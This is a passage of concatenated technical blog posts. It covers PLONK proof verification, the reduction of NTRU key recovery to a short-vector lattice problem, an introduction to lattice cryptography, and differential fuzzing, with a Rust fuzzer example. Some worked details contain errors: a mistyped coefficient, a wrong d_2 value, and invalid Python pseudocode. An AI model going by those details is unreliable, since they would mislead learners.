$$[S_{\sigma1} ], [S_{\sigma2} ], [S_{\sigma3} ], [q_L], [q_R], [q_M], [q_O], [q_C]$$</p>
Extraction of values and commitments</h3>
Challenges</h4>
Firstly, the verifier needs to compute all the challenges. For that, he follows these steps:</p>
    * Add $[a], [b], [c]$ to the transcript.</span></span>
    * Sample two challenges $\beta, \gamma$.</span></span>
    * Add $[z]$ to the transcript.</span></span>
    * Sample a challenge $\alpha$.</span></span>
    * Add $[t_{lo} ], [t_{mid} ], [t_{hi} ]$ to the transcript.</span></span>
    * Sample a challenge $\zeta$.</span></span>
    * Add $\bar a, \bar b, \bar c, \bar s_{\sigma 1}, \bar s_{\sigma 2}, \bar z_\omega$ to the transcript.</span></span>
    * Sample a challenge $\upsilon$.</span></span></code></pre>Compute $pi(\zeta)$</h4>
Also, he needs to compute a few values of all these data. First, he computes the $PI$ matrix with the public inputs and outputs. He needs to compute $pi(\zeta)$, where $pi$ is the interpolation of $PI$ at the domain $H$. But he doesn’t need to compute $pi$. He can instead compute $pi(\zeta)$ as

$$ \sum_{i=0}^n L_i(\zeta) PI_i,$$

where $n$ is the number of public inputs and $L_i$ is the Lagrange basis at the domain $H$.</p>
Compute claimed values $p(\zeta)$ and $t(\zeta)$</h4>
He computes $\bar p_{c} := pi(\zeta) + \alpha \bar z_\omega (\bar c + \gamma) (\bar a + \beta \bar s_{\sigma1} + \gamma) (\bar b + \beta \bar s_{\sigma2} + \gamma) - \alpha^2 L_1(\zeta)$</p>
This is the constant</em> part of the linearization of $p$. So adding it to what the prover claims to be $\bar p_{nc}$, he obtains

$$p(\zeta) = \bar p_{c} + \bar p_{nc}$$</p>
Concerning $t(\zeta)$, this is actually already $/bar t$.</p>
Compute $[t_{\text{partial}}]$ and $[p_{nc}]$</h4>
He computes these of the commitments in the proof as follows:

$$ [t_{\text{partial}}] = [t_{lo}] + \zeta^{N+2}[t_{mid}] + \zeta^{2(N+2)}[t_{hi}] $$</p>
For $[p_{nc}]$, first compute</p>
$$

\begin{aligned}

\left[\hat p_{nc1}\right] &= \bar a[q_L] + \bar b[q_R] + (\bar a\bar b)[q_M] + \bar c[q_O] + [q_C] \newline

[\hat p_{nc2}] &= (\bar a + \beta\zeta + \gamma)(\bar b + \beta k_1\zeta + \gamma)(\bar c + \beta k_2\zeta + \gamma)[z] - (\bar a + \beta \bar s_{\sigma1} + \gamma)(\bar b + \beta \bar s_{\sigma2} + \gamma)\beta \bar z_\omega [S_{\sigma3}] \newline

[\hat p_{nc3}] &= L_1(\zeta)[z]

\end{aligned}

$$</p>
Then $[p_{nc}] = [p_{nc1}] + [p_{nc2}] + [p_{nc3}]$.</p>
Compute claimed value $f_{\text{batch}}(\zeta)$ and $[f_{\text{batch}}]$</h4>
Compute $f_{\text{batch}}(\zeta)$ as</p>
$$

f_{\text{batch}}(\zeta) =

\bar t +\upsilon \bar p_{nc} + \upsilon^2 \bar a + \upsilon^3 \bar b + \upsilon^4 \bar c + \upsilon^5 \bar s_{\sigma1} + \upsilon^6 \bar s_{\sigma2}

$$</p>
Also, the commitment of the polynomial $f_{\text{batch}}$ is

$$\left[f_{\text{batch}}\right] = \left[ t_{\text{partial}} \right] +\upsilon [p_{nc}] + \upsilon^2 [a] + \upsilon^3 [b] + \upsilon^4 [c] + \upsilon^5 [S_{\sigma1}] + \upsilon^6 [S_{\sigma2}]$$</p>
Proof check</h3>
Now the verifier has all the necessary values to proceed with the checks.</p>
    * Check that $p(\zeta)$ equals $(\zeta^N - 1)t(\zeta)$.</span></span>
    * Verify the opening of $f_{\text{batch}}$ at $\zeta$. That is, check that $\text{Verify}([f_{\text{batch}}], \pi_{\text{batch}}, \zeta, f_{\text{batch}}(\zeta))$ outputs _Accept_.</span></span>
    * Verify the opening of $z$ at $\zeta\omega$. That is, check the validity of the proof $\pi_{single}$ using the commitment $[z]$ and the value $\bar z_\omega$.  </span></span></code></pre>
That is, check that $\text{Verify}(\left[z\right] , \pi_{\text{single}}, \zeta\omega, \bar z_\omega )$ outputs Accept</em>.</p>
If all checks pass, he outputs Accept</em>. Otherwise, outputs Reject</em>.</p>
Summary</h2>
In this post, we covered the working principles and protocol basics of PLONK, a commonly used ZK-SNARK. We saw how to transform the computation into a group of polynomial constraints over the elements of the computation trace. Then, we saw how to enforce these constraints and how to prove the correct wiring, using a permutation argument. In an upcoming post, we will be covering optimizations to the basic protocol, including custom gates, look-up tables, folding schemes and other commitment schemes.</p>


How to get a true headache: brute forcing NTRU
Unknown — Mon, 24 Apr 2023 00:00:00 +0000
Introduction</h2>
Lattice cryptography is a type of cryptographic scheme that relies on the hardness of certain computational problems related to lattices, which are geometric structures formed by repeating a pattern of points in space. Lattice-based cryptography is considered a promising candidate for post-quantum cryptography, as it is believed to be resistant to attacks by quantum computers.</p>
The NTRU (N-th degree Truncated polynomial Ring Units) cryptosystem is a lattice-based public-key cryptosystem that was introduced in 1996. It is based on the properties of a specific type of lattice called an ideal lattice, a particular type constructed from the ideals of a polynomial ring. The NTRU cryptosystem uses polynomials with small coefficients to generate public and private keys, which are then used for encryption and decryption. For more details, see our previous post</a>. In this post, we will explain how finding the private key is equivalent to finding short vectors on a lattice and give bounds on brute-force attacks.</p>
The public and private keys in NTRU</h2>
In our previous post</a>, we discussed the NTRU encryption scheme. We now head to show how its keys are related to a specific lattice; the encryption and decryption processes are irrelevant for this purpose; hence they can be left aside.</p>
Recall from our previous post the ring $R = \mathbb Z[X]$ and the ring $R_q = \mathbb Z_q[X]$. The private key in NTRU consists of two polynomials $f,g \in R$ whose coefficients are somehow small</em> : they are allowed to be only equal to 0, 1, or -1. These are called ternary</em> polynomials.</p>
The polynomial $f$ must have an inverse $F \in R_q$. For example, let $N = 5, q = 37$ and

$$

f = 1 + x - x^2 + x^4.

$$ Letting $F \in R$ be the polynomial given by

$$

F = 29x^4 + 35x^3 + 22x^2 + 12x + 32,

$$ let’s show that $F$ is the inverse of $f$ in $R_q$.</p>
Recall that the product in $R_q$ is explained in our previous post: we multiply as usual, replacing the appearance of $x^N$. Then in our example, we have that

$$

\begin{align*}

fF & = 29x^8 + 35x^7 + 30x^6 + 6x^5 + 8x^3 + 2x^2 + 7x + 32 \newline

& = (29+8)x^3 + (35+2)x^2 + (30+7) x + (6+32) \newline

& = 1.

\end{align*}

$$ This example shows that the inverse of $f$ can have arbitrarily large coefficients, even though $f$ is small.</p>
The public key is the polynomial $h \in R_q$ given by $h = Fg$. In our example, if we let

$$

g = x - x^3 - x^4

$$ We have that

$$

h = 28x^4 + 35x^3 + 22x^2 + 12x + 32.

$$ We see that though $h$ is constructed from ternary polynomials, it is far from being ternary.</p>
The convolution ring revisited</h2>
By replacing every appereance of $x^N$ with 1, we can write every polynomial $h \in R$ as $h = h_0+\cdots+h_{N-1}x^{N-1}$. Moreover, we will identify the polynomial $h$ with the vector $\mathbf h = (h_0,\dots,h_{N-1})$.</p>
In these terms, the multiplication in $R$ can be stated in matrix form. More precisely, let $M_\mathbf{h} \in \mathbb Z^{N\times N}$ be the matrix given by.

$$

M_h = \left(\begin{array}{cccc}h_0 & h_1 & \cdots & h_{N-1} \newline h_{N-1} & h_0 & \cdots & h_{N-2} \newline \vdots & \vdots & \ddots & \vdots \newline h_1 & h_2 & \cdots & h_0\end{array}\right).

$$

Then, given a polynomial $f \in R$ and letting $g = fh$, it is not hard to see that we have the equality of vectors

$$\mathbf{g} = \mathbf{f} \cdot M_{\mathbf h}.$$ Regarding the example above, the reader can verify that modulo 37, we have that</p>
$$

(0, 1, 0, -1, -1) =

(1, 1, -1, 0, 1)\cdot \left(\begin{array}{rrrrr}

32 & 12 & 22 & 35 & 28 \newline

28 & 32 & 12 & 22 & 35 \newline

35 & 28 & 32 & 12 & 22 \newline

22 & 35 & 28 & 32 & 12 \newline

12 & 22 & 35 & 28 & 32

\end{array}\right).$$</p>
The NTRU lattice</h2>
The natural attack involves looking for ternary polynomials $f,g \in R$ such that $fh = g \in R_q$. Equivalently, such that there exists $k \in R$ such that

$$ fh = g + qk \quad \in R.$$</p>
To use the matrix formulation from above, we introduce the block matrix $M_{\mathbf h,q}$ given by

$$

M_{\mathbf h,q} = \left(\begin{array}{cc}I_N & M_{\mathbf h} \newline 0 & qI_N \end{array}\right).

$$ Note that it has a nonzero determinant. This means that its rows form a basis of $\mathbb R ^{2N}$. In particular, they span a (public) lattice, which we will denote by $L_{h,q}$.</p>
Considering block multiplication, we see that the equality above is rewritten as

$$ (\mathbf f,-\mathbf k) \cdot M_{\mathbf h,q} = (\mathbf f,\mathbf g).$$ From here on, we can leave polynomials aside.</p>
Note that the vector on the left-hand side is obtained by linearly combining the rows from $M_{\mathbf h,q}$ with the coefficients of $(\mathbf f,- \mathbf k)$, which are integers. In other words, this is a vector in the lattice $L_{h,q}$.</p>
The vector on the right-hand side, being $f$ and $g$ ternary, is a small (or short</em>) vector. Thus, breaking NTRU is equivalent to finding short vectors in the lattice $L_{h,q}$ given by the public key.</p>
Finding short vectors, the rough way</h2>
Lattices: recalling the basics</h3>
Recall that given a basis $v_1 , \dots , v_n$ of $\mathbb R^n$, the lattice $L$ defined by this basis is

$$ L = \{ \sum_{ i = 1 }^n k_i v_i : k_i \in \mathbb Z \}.$$</p>
It is easy to see that if we apply to the given basis a base change given by a matrix with integral coefficients and determinant 1 or -1 (a unimodular</em> matrix), we obtain a different basis for $L$. Moreover, every other basis for $L$ is obtained in this way.</p>
For example, the lattice in the plane defined by the canonical basis $e_1 = (1,0), e_2 = (0,1)$ can also be defined by the basis

$$ v = (-7226, 23423),\quad w = (379835, -1231231). $$ In fact,$$-1231231 v - 379835 w = e_1, \quad -23432 v - 7226 w = e_2,$$ which shows that $e_1$ and $e_2$ (and hence every integral combination of them) can be written as an integral combination of $v$ and $w$.</p>
As we see, the same lattice can have more and less complicated bases.</p>
The volume</h3>
The most important invariant of a lattice $L$ is its volume</em> , which is the size of the parallelepiped $\mathcal F$ generated by a basis $\mathcal B$ of $L$.</p>
</p>
It can be computed as $$vol (L) = |\det(C)|$$ where $C$ is the matrix having the vectors in $\mathcal B$ as columns (the reader interested in understanding why this computes the volume should consider the case $n = 2$). This number is independent of the chosen basis (i.e., an invariant</em> of $L$) since changing $\mathcal B$ resorts to multiply $C$ by a unimodular matrix.</p>
The volume is essential for our cryptographic interests since it gives a bound for the size of the shortest vector.</p>
Short vectors: brute force</h3>
Every lattice $L$ contains the zero vector, which is naturally discarded when discussing short vectors. More precisely, a _shortest vector in $L$ is a nonzero vector $v \in L$ such that $\Vert v\Vert$ is minimum. Such a vector exists, though it is not unique: for example, because $\Vert v\Vert = \Vert- v\Vert$.</p>
From a XIX century result due to Hermite, we know that</p>

The lattice $L$ contains a shortest vector $v$ such that $|v_i| \leq vol(L)^{1/n}$ for every $1 \leq i \leq n$.</p>
</blockquote>
This gives us a box $B$ where we can, by brute force, perform a search for shortest vectors.</p>
How expensive would this be? Roughly, $ L \cap B$ should be the number of times $\mathcal F$ fits in $B$. Hence from the result of Hermite, we get that

$$ L \cap B \sim vol(B) / vol(L) = ( 2 vol(L)^{ 1/n } )^n / vol(L) = 2^n,$$ which shows that brute force is impractical for large $n$, independently of $L$. This continues to hold for the slight improvements available for Hermite’s result.</p>
Summary</h2>
In this post, we described how to transform the problem of finding the key in NTRU involving polynomials into a matrix problem. We explained the lattice behind the NTRU public key and how finding the private key can be reduced to finding short vectors in that lattice. We also provided some bounds on how hard it is to find short vectors, in general, using brute force attacks, showing that it is impractical for sufficiently large values of $n$, that is, polynomials of very large degrees. In upcoming posts, we will cover the fundamentals of other lattice schemes, such as CRYSTALS Kyber, and those related to fully homomorphic encryption, as well as more efficient lattice reduction techniques.</p>


I want to break free from Lattice-based cryptography, but not even a quantum computer can help me
Unknown — Tue, 18 Apr 2023 00:00:00 +0000
Introduction</h2>
Public key encryption is a secure way of sending information over the internet. It uses two keys: a public key and a private key. We use the public key to encrypt messages. We can share this key publicly. The private key is kept secret and only known to the owner, who can use it to decrypt messages. This concept was introduced in a groundbreaking paper by Diffie and Hellman in the late 1970s and offered several advantages over previously used methods, including enhanced security, secure key exchange, digital signatures, scalability, and easier key management.</p>
The working principle behind public key cryptography is that some complex mathematical problem (which can be easily verified if we know the solution or some secret information, but it is otherwise computationally expensive) relates the keys. For example, in the RSA cryptosystem, the public key denoted as $e$, and the private key, represented as $d$, are related by the expression $d \times e \equiv 1 (\mod \phi(n))$. This means that $e$ is the multiplicative inverse of $d$ modulo a function called Euler’s totient function evaluated at $n$, denoted as $\phi(n)$. There are efficient algorithms to compute modular inverses. Still, they require knowing the prime factorization of $n$, which is very hard for large numbers and could take longer than our lifespans, even with the fastest supercomputers.</p>
Elliptic curve cryptography is another type of public key cryptography that uses a different mathematical approach. In this system, the secret key, denoted as $sk$, is related to the public key, denoted as $pk$, through a generator of a large subgroup of an elliptic curve, represented as $g$, by the expression $pk = g^{sk}$. We can recover the secret key from the public key if we find the exponent in this expression, known as the discrete logarithm problem. Depending on the properties of the curve and its subgroups, this problem can be tough to solve.</p>
However, there is a potential threat to these public key encryption schemes posed by the advent of quantum computers, which are based on a different technology than conventional computers and can solve specific hard problems much faster. To address this, cryptographers have been working on other encryption schemes that can resist quantum computers, known as post-quantum secure cryptosystems. The NIST (National Institute of Standards and Technology) is standardizing one or more quantum-secure algorithms. Many of these schemes are based on the hardness of specific problems over lattices, leading to lattice-based cryptography.</p>
Lattice-based cryptography is resistant to quantum computers and can also be used to construct fully homomorphic encryption schemes, which have important applications in secure computing and data privacy.</p>
Lattices</h2>
In mathematics, a lattice is a regular arrangement of points in a multi-dimensional space, forming a grid-like structure. Imagine a piece of graph paper where the intersections of the horizontal and vertical lines create a lattice. Depending on the problem being addressed, lattices can have different shapes, sizes, and dimensions depending on the problem being addressed.</p>
Formally, a lattice can be defined as a set of points generated by linear combinations of a set of basis vectors with integer coefficients. These basis vectors define the directions and spacing of the lattice points. The lattice can span multiple dimensions, with each dimension corresponding to a different basis vector. For example, in two-dimensional space, a lattice can be represented by two basis vectors that define the spacing between the lattice points along the horizontal and vertical directions. Below is the image of a hexagonal lattice spanned by two vectors forming a 120° angle.</p>
</p>
Given a set of linearly independent vectors, $\mathbb{V} = { v_1 , v_2 , v_3 , … , v_m }$ in $\mathbb{R}^n$, the lattice generated by $\mathbb{V}$ is given by the set,</p>
$$ L = { a_1 v_1 + a_2 v_2 + \dots + a_m v_m : a_k \in \mathbb{Z}}$$</p>
The dimension of $L$ is the number of vectors in a basis for $L$. We can use other vectors as basis $\mathbb{W} = { w_1 , w_2 , \dots , w_m}$ for $L$. The basis vectors are related by

$w_1 = a_{11} v_1 + a_{12} v_2 + \dots + a_{1m}v_m$

$w_2 = a_{21} v_1 + a_{22} v_2 + \dots + a_{2m}v_m$

$\vdots$

$w_m = a_{m1} v_1 + a_{m2} v_2 + \dots + a_{mm}v_m$</p>
which can be written in matrix form as

$$\mathbf{w} = A \mathbf{v}$$</p>
The matrix $A$ is invertible, and we can also write the relationship between the bases as

$$A^{-1} \mathbf{w} = \mathbf{v}$$</p>
For example, in $\mathbb{R}^3$ we can have a cubic lattice using as vectors three perpendicular vectors, which we can represent as $E = { (1,0,0) , (0,1,0) , (0,0,1) }$; the lattice is given by the triple of integers $(x,y,z)$. We could also select as basis the vectors $B = { (2,1,1), (3,2,1), (1,1,1)}$. The matrix $A$ contains as rows the vectors from $B$.</p>
Some bases are nicer than others. For example, the basis $E$ has three perpendicular (orthogonal) vectors of length 1. On the other hand, the vectors in basis $B$ are more prolonged and not perpendicular. We will shortly see that a nicer basis allows us to solve some lattice problems easily.</p>
Shortest Vector Problem</h2>
Two important mathematical problems in lattices are the following:</p>
    * Shortest vector problem (SVP): we want to find a non-zero vector $\mathbf{v}$ in the lattice having the shortest length, $\Vert \mathbf{v} \Vert$.</span></span>
    * Closest vector problem (CVP): given $\mathbf{w}$ in a lattice, we want to find a vector $\mathbf{v}$ which is closest to $\mathbf{w}$, that is, we want the vector $\mathbf{w} - \mathbf{v}$ to have minimal length.</span></span></code></pre>
When we have an orthogonal set of basis vectors (that is, each pair of vectors is orthogonal), we can use the Pythagorean theorem to see that

$$\Vert \mathbf{u} \Vert^2 = a_1^2 \Vert \mathbf{v_1} \Vert^2 + a_2^2 \Vert \mathbf{v_2} \Vert^2 + \dots + a_m^2 \Vert \mathbf{v_m} \Vert^2$$

where all $a_k$ are integers. Therefore, the vectors of minimal length are contained in the set ${ \pm \mathbf{v_1} , \pm \mathbf{v_2} , \dots , \pm \mathbf{v_m}}$</p>
If the basis is not orthogonal but still “nice,” we can use Babai’s algorithm to obtain a “good” approximation to the solution. This strategy fails if the basis vectors are close to each other.</p>
Ring Learning with Errors</h2>
The Learning with Errors (LWE) problem is a mathematical problem used in cryptography to secure communication and protect data. It involves finding a hidden pattern in noisy data. Think of it like trying to solve a puzzle where you are given a bunch of equations with some errors, and you need to figure out the correct relationship between the variables despite the errors. In LWE, the equations are represented as numbers modulo a large prime number, and the goal is to find the hidden linear relationship between them despite the noise.</p>
Formally, given pairs $(\mathbf{a} , b)$ related by some linear function $b_k \approx \mathbf{s^t}.\mathbf{a}$ the goal is to distinguish these pairs from uniformly sampled random points $(\mathbf{x} , y)$. Each pair $(\mathbf{a}_k , b_k)$ contains a random error $e_k$, and we have to find $\mathbf{s}$ despite these errors.</p>
Convolution polynomial rings</h2>
Say we are working with the polynomials with coefficients over some ring, such as the integers, $\mathbb{Z}[x]$. The following set gives the $n$-th degree convolution polynomials

$$ R = \mathbb{Z}[x] / (x^n - 1) $$</p>
This means we have polynomials modulo $x^n - 1$ analogously as we worked with integers. In integers, we said that $15 \equiv 1 \mod 7$ because it can be written as a multiple of $7$ plus a remainder, that is, $15=2\times 7 + 1$. We could work easily with $1$ instead of $15$ and operate with it. In polynomials, $x^5 + x^2 + 1 \equiv x + 2 \mod x^2 - 1$, because

$$ x^5 + x^2 + 1 = (x^2 - 1)(x^3 + x^2 + x +1) + (x + 2)$$</p>
The exciting property when using $x^n -1$ is that whenever we spot a power $x^n$, we can replace $x^n$ by $1$ (in the case of more complex polynomials, we would have to carry out the division and find the remainder). This also leads to a more straightforward expression for polynomial multiplication. Let’s look at an example first,

$$ (x^2 + 3 x + 5)(2x^2 + 2 x + 7) = p(x) \mod (x^3 - 1)$$

The standard calculation would make us apply distributive property, sum all terms with the same powers and reduce all powers greater than 2:

$$ 2x^4 + 2x^3 + 7x^2 + 6x^3 + 6x^2 + 21x + 10x^2 + 10 x +35 = p(x)$$

Summing,

$$ 2x^4 + 8x^3 + 23 x^2 + 31 x + 35 = p(x)$$

Applying the reduction,

$$p(x) = 23 x^2 + 33 x + 43$$

A more straightforward way would be to realize that the coefficient $p_k$ for term $x^k$ is given by this expression:

$$p_k = \sum_{i+j \equiv k \mod 3} a_i b_j$$

For $x^2$ we have

$$p_2 = a_2 b_0 + a_1 b_1 + a_0 b_2 = 7 + 6 + 10 = 23$$

For $x$ we have

$$p_1 = a_1 b_0 + a_0 b_1 + a_2 b_2 = 2 + 21 + 10 = 33$$

Finally,

$$p_0 = a_0 b_0 + a_2 b_1 + a_1 b_2 = 35 + 2 + 6 = 43$$</p>
In general, we have

$$a(x) \times b(x) = c(x)$$

where

$$ c_k = \sum_{i+j \equiv k \mod n} a_i b_{k-i}$$</p>
If you studied Laplace or Fourier transform, you’ll find that it is the convolution of $a$ and $b$. If the coefficients of the polynomials can only take the values $-1, 0, 1$, then the previous calculation is even faster.</p>
We can work with polynomials defined over some finite field, $\mathbb{Z}_q$. The convolution polynomial ring is

$$R_q = \mathbb{Z_q}[x]/(x^n - 1)$$</p>
In $\mathbb{Z}_q$, we saw that an element $a$ had a multiplicative inverse $b$ (such that $a\times b \equiv 1 \mod q$) if and only if $a$ and $q$ are coprime, that is, $gcd(a,q) = 1$ (gcd stands for greatest common divisor). An analogous result exists in $R_q$, stating that a polynomial $p(x)$ has a multiplicative inverse, $q(x)$, ($p(x)q(x) \equiv 1 \mod x^n -1$) if and only if $gcd(p(x) , x^n -1)=1$.</p>
Lattices and polynomial rings</h2>
We can map elements from a polynomial ring into points of a lattice. The simplest way is via the coefficient embedding: we see the $k$-th coefficient, $p_k$ as the $k-th$ coordinate of a vector in $\mathbb{Z}_q^k$. This embedding has the nice property that adding polynomials corresponds to the component-wise addition of lattice points, but multiplication does not have a nice geometrical interpretation. In an upcoming post, we will explain in more detail how to reduce the NTRU key recovery to the shortest vector problem over some lattice.</p>
NTRU</h2>
NTRU (N-th degree Truncated polynomial Ring Units) is a public key encryption scheme that works using three convolution polynomial rings,

$$\mathcal{R} = Z[x]/(x^n - 1)$$

$$\mathcal{R_q} = Z_q[x]/(x^n - 1)$$

$$\mathcal{R_p} = Z_p[x]/(x^n - 1)$$</p>
where $n$ is a prime number and not equal to $q$. A pair of polynomials gives the secret keys in NTRU, whose coefficients can only take the values $-1, 0, 1$. These polynomials are called trinary polynomials and denote their families by $\mathcal{T}(d_1 , d_2)$. $d_1$ is the number of coefficients equal to one, and $d_2$ is the number of coefficients equal to $-1$ (given that the polynomial has degree at most $n$, there are $n - d_1 - d_2$ coefficients equal to zero). For example, $x^3 - x^2 + 1$ is a trinary polynomial ($d_1 = 2$, $d_2 = -1$), while $2x^3 + x - 3$ is not. The private key is given by the pair $f(x)$ and $g(x)$, where

$f(x) \in \mathcal{T}(d+1 , d)$

$g(x) \in \mathcal{T}(d , d)$</p>
The polynomial $f(x)$ has $d+1$ ones, and $d$ coefficients equal $-1$ (If the polynomial has the same amount of $-1$ and $1$, it has no multiplicative inverse).</p>
We next calculate $F_q (x) = {f(x)}^{-1}$ and $F_p (x) = {f(x)}^{-1}$ in the rings $\mathcal{R_q}$ and $\mathcal{R_p}$, respectively and obtain the public key as

$h(x) = F_q (x) g(x)$

in $\mathcal{R_q}$ (If the polynomial $f(x)$ has no inverse, we have to choose another one). This is the key we will use to encrypt messages. The decryption key is given by $(f(x) , F_p(x))$.</p>
We must encode messages as polynomials in the ring $\mathcal{R_p}$ to encrypt messages. As such, they will have coefficients in the range ${ -p/2, -(p-1)/2, …, -1, 0, 1, …, p/2}$. We sample some random polynomial, $r(x)$ in $\mathcal{T}(d,d)$ and compute the ciphertext as

$c(x) = p h(x) r(x) + m(x) \mod q$

We can see we are adding some “random noise” to the plaintext to hide it.</p>
If we want to decrypt, we first compute

$a (x) = f(x) c(x) \mod q$

$b (x) = F_p (x) a(x) \mod p$</p>
If we choose the parameters correctly, then $b(x) = m(x)$, which we can decode to obtain the message. To specify NTRU, we need to set the values $(n, q, p, d)$, where $n$ and $q$ are coprime and $q > (6 d +1 )p$. To understand why this works, we can look at the calculations in more detail:

$a(x) = f(x) c(x) \mod q$

If we expand $c(x)$,

$a(x) = p f(x) F_q (x) g(x) r(x) + f(x)m(x) \mod q$

but $f(x) F_q (x) \equiv 1 \mod q$, so

$a(x) = p g(x) r(x) + f(x)m(x) \mod q$

The assumption $q > (6d + 1)p$ ensures that the polynomial $a(x)$ is computed exactly and there is no wrap-around $q$.

When we apply $F_p (x)$, we get

$b(x) = p F_p (x) g(x) r(x) + F_p (x) f(x) m(x) \mod p$

Given that all the coefficients of $p F_p (x) g(x) r(x)$ are multiples of $p$ (the factor $p$ first ensures this), that polynomial vanishes modulo $p$. We are left with

$b(x) = F_p (x) f(x) m(x) \mod p$

but $F_p (x)$ is the inverse of $f(x)$ in $\mathcal{R_p}$, so

$b(x) = m(x)$</p>
Summary</h2>
Lattice-based cryptography is a promising solution to protect against potential attacks from quantum computers. Lattices are organized arrangements of points in multi-dimensional spaces that form the foundation of lattice-based cryptography. These lattices allow for the construction of encryption schemes. The hardness of specific problems over lattices, such as the Learning With Errors (LWE) problem and the Shortest Vector Problem (SVP), serve as the basis for the security of lattice-based cryptography. These problems are believed to be difficult even for quantum computers, making lattice-based cryptography a compelling option for post-quantum security. In upcoming posts, we will cover more on the fundamentals of lattices and encryption schemes such as CRYSTALs Kyber.</p>


Do You Want Quality Code? Learn How to Use Differential Fuzzers!
Unknown — Fri, 14 Apr 2023 00:00:00 +0000
Let’s be honest, who hasn’t missed testing an edge case in their life? Surely it has happened to you, and maybe you realized it months after having implemented it (maybe when it’s already in production!). Some cases escape even the most experienced tester, and to avoid explanations to your manager, today we present the concept of fuzzing, and one of its types: the differential fuzzer.</p>
As stipulated by the OWASP Foundation:</p>

Fuzz testing or Fuzzing is a Black Box software testing technique, which consists in finding implementation bugs using malformed/semi-malformed data injection in an automated fashion.</p>
</blockquote>
Fuzzing is a very efficient technique when looking for errors in our code. This is achieved by generating a massive set of random entries that are used to test a program. The resulting tests often manage to reach less common cases, the kind that can go usually be overlooked.

If you are interested in learning more about the fuzzer concept in general you can watch the videos we made on the subject, hacking with fuzzers</a> and fuzzing tools</a></p>
However, this tool is not limited to a single program, or to only finding errors that end up causing a crash; we can also compare the outputs of at least two different implementations of the same program and check that they follow the same behavior; this is known as differential fuzzing.</p>
When should we use differential fuzzing?</h2>
The cases in which we can use the differential fuzzing technique are where we have two different implementations of the same algorithm. For example, let’s think about all the different languages in which the Ethereum Virtual Machine</a> is implemented. The simple magic of the differential fuzzer is to test massively with different inputs that all implementations return the same result when running the same process or function. If this is not the case, at least one of the implementations has logic errors and is giving us a result that was not expected.</p>
Structure of a differential fuzzer</h2>
The structure of a differential fuzzer is simple, first, we define which tool we are going to use for fuzzing since we have a large number of tools for this purpose like Honggfuzz</a>, Cargofuzz</a>, Atheris</a> and many more.</p>
Whichever tool you choose (we do not judge preferences here), all tools should provide us with the same thing, a series of random inputs that we will inject into the code to be tested.</p>
With the input provided by the fuzzer, we adapt it to each of the implementations. In this way, both should have the same input at the end, and we tell the fuzzer to return an error if the results differ. This will give us a list of inputs where at least one of the implementations has an error in its logic, giving a different result than the expected one.</p>
For this, we may need intermediate functions to ensure that the result returned by both implementations is comparable.</p>
Example of a differential fuzzer</h2>
#![no_main]</span></span>
use libfuzzer_sys::fuzz_target;</span></span>
use std::io::prelude::*;</span></span>
use inflate::inflate_bytes;</span></span>
use libflate::deflate::Decoder;</span></span>
</span>
// This differential fuzzer panics if two different implementations for deflate</span></span>
// decode function returns different results </span></span>
</span>
fuzz_target!(|data: &[u8]| {</span></span>
    let mut libflate_decoded = Decoder::new(data);</span></span>
    let mut decoded_data = Vec::new();</span></span>
    let libflate_res = libflate_decoded.read_to_end(&mut decoded_data).is_ok();</span></span>
</span>
    let inflate_decoded = inflate_bytes(data).is_ok();</span></span>
    </span></span>
    if libflate_res != inflate_decoded {</span></span>
    panic!("differential fuzz failed {}-{}",</span></span>
            libflate_res, inflate_decoded)</span></span>
    }</span></span>
    </span></span>
});</span></span></code></pre>
In the example, we can see an example of a differential fuzzer. This fuzzer is created using the libfuzzer</code> tool, meant to be used in Rust. the structure of the code is simple and it’s the same for all the fuzzer tools that you want to use.</p>
First, we have the imports that include the implementations we want to compare in our fuzzer. Then we have the function that´s going to run the fuzzer, in this case, is the fuzz_target!()</code> function. This function supplies us with a randomly generated input, in this case, the variable data</code>. With the previous data</code> generated, we run the piece of code that we want to test. In cases like the one in the example code used by libflate,</code> we need to adjust the random data</code> to be received by the code in the first instance. As the last step we do the differential magic, that is, we compare the result returned by the different implementations.</p>
</p>
In this case, as we can see in the image when we run the fuzzer, it finds a crash because one of the implementations returns a valid result and the other one an error.</p>
Inputs and outputs</h2>
According to every particular case of inputs and outputs, we might need to provide some extra code.</p>
Let’s understand what that means with a simple example. We might be comparing two implementations of some code that receives a quadratic equation</a> and an answer and returns if the answers responds to the equation. In this case, one of the implementations receives 4 numbers that correspond to the index of the equation and the answer and the other receives the input as a string with the equation, something like “axx+bx+c=d”.</p>
# Implementation 1 </span></span>
def check_if_answer(a,b,c,d, answer):</span></span>
    result = (a * answer^2) + (b * answer) + c </span></span>
     </span></span>
    if result == d: { </span></span>
        True</span></span>
    } </span></span>
    else: {</span></span>
        False</span></span>
    }</span></span>
    </span></span>
# Implementation 2</span></span>
def check_if_anwer(equation, answer):</span></span>
    </span></span>
    string_without_x = remove_x_from_string(equation) # This returns "a+b+c=d"</span></span>
    array_of_indexes = split_string(string_without_x) # This returns [a,b,c,d]</span></span>
    [a,b,c,d] =  array_of_indexes</span></span>
    result = (a * answer^2) + (b * answer) + c </span></span>
     </span></span>
    if result == d: { </span></span>
        True</span></span>
    } </span></span>
    else: {</span></span>
        False</span></span>
    }</span></span></code></pre>
To give the different implementations the “same” input we need to adjust the starting input so it’s the same for both. In the output, we have to do the same. One of the implementations might return True/ False while the other return 0/1, we need to adjust the outputs so the equality works as it has to.</p>
This applies to both regular and differential fuzzers.</p>
Conclusion</h2>
A differential fuzzer is a very valuable tool in case you are implementing a process that already has another implementation to ensure that even the edge cases are handled consistently. This tool can also be used in the case of choosing implementations of a solution that we want to use for our project, by comparing the effectiveness of each one.</p>


Transforming the Future with Zero-Knowledge Proofs, Fully Homomorphic Encryption and new Distributed Systems algorithms
Unknown — Thu, 13 Apr 2023 00:00:00 +0000
Disclaimer: To maintain brevity and clarity, we have simplified certain concepts. In this discussion, Zero Knowledge Proofs and Computational Integrity are considered as a single concept, and we will not address the distinct security properties of Proof of Work and Proof of Stake.</p>
The evolution of every scientific discipline or engineering field experiences cycles akin to those observed in economies. Incremental advancements are made daily by corporations, individuals, and academic institutions. Occasionally, a researcher or engineer makes a groundbreaking discovery that alters the course of the field. One such example is Sir Isaac Newton, who made significant contributions to calculus, motion, optics, and gravitation during the time of the bubonic plague, which claimed millions of lives. His relentless pursuit of knowledge throughout the pandemic proved instrumental in shaping the development of mathematics, physics, and engineering. Our comfortable modern lives stand upon the foundation of these monumental discoveries.</p>
